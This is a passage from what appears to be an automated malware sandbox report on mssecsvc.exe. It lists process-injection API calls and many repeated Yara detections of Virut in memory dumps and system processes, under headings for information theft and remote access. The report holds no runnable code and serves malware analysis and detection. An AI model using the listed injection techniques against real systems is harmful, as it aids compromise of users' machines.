6_2_00AD116F

Source: C:\Windows\mssecsvc.exe

Code function: 6_2_00AD042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,

6_2_00AD042D

Source: C:\Windows\mssecsvc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.27.dr

Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Virut

Source: Yara match	File source: 17.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000002.2720636903.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2719092458.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2718376405.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1868184392.000000007FFF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1469139921.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2280238468.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2719581126.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2777494237.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.1579253830.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2718396660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.1551989723.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2718267078.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.1562843216.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1520258438.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1497422002.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2718865273.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.1513385761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1710675304.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1712970939.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2719553271.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2720264639.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2718953458.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2718552816.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2719630248.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2718375782.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2719418097.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.1584365051.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.1583741288.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2719011781.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2718548042.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2719776272.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2718214298.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.1504207342.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2718602569.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2720101514.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.1556664324.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.1570640748.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2719011282.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000000.1588780357.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2719447551.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2720025241.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2718553282.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1545080050.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2718952875.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2718656610.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2719064286.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.1571774510.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2718712243.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2718209391.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2718895917.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2719387016.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2719121091.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2718893631.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2720214040.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2777701008.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.1594507271.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2719934656.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.1547825890.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000000.1588816089.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2718545796.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2718556376.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1492508014.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2718554809.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2777494761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.1507806969.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2777490892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.1522321273.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.1563869827.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2718078909.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2718957847.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.1532350980.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1472570641.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2718684916.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.1594553743.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2718378800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2719525179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2719008114.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.1588961193.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2718657929.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2718502180.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.1516012200.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2720745515.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2720463440.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.1517859323.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2718374412.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2718205451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2777847193.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2719199540.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2719360325.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1495914379.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2718655372.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2777706559.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.1594740605.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2719250523.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.1573456651.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2720028033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1546866705.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.1483800032.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2718814793.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 4432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: winlogon.exe PID: 556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 5568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 5628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 1196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwm.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2020, type: MEMORYSTR

Remote Access Functionality

Yara detected Virut

Source: Yara match	File source: 17.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000002.2720636903.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2719092458.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2718376405.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1868184392.000000007FFF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1469139921.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2280238468.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2719581126.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2777494237.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.1579253830.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2718396660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.1551989723.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2718267078.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.1562843216.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1520258438.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1497422002.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2718865273.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.1513385761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1710675304.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1712970939.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2719553271.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2720264639.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2718953458.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2718552816.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2719630248.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2718375782.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2719418097.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.1584365051.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.1583741288.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2719011781.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2718548042.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2719776272.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2718214298.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.1504207342.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2718602569.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2720101514.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.1556664324.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.1570640748.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2719011282.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000000.1588780357.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2719447551.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2720025241.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2718553282.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1545080050.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2718952875.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2718656610.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2719064286.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.1571774510.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2718712243.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2718209391.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2718895917.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2719387016.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2719121091.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2718893631.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2720214040.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2777701008.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.1594507271.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2719934656.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.1547825890.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000000.1588816089.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2718545796.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2718556376.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1492508014.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2718554809.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2777494761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.1507806969.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2777490892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.1522321273.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.1563869827.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2718078909.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2718957847.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.1532350980.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1472570641.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2718684916.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.1594553743.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2718378800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2719525179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2719008114.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.1588961193.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2718657929.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2718502180.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.1516012200.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2720745515.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2720463440.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.1517859323.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2718374412.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2718205451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2777847193.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2719199540.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2719360325.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1495914379.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2718655372.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2777706559.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.1594740605.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2719250523.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
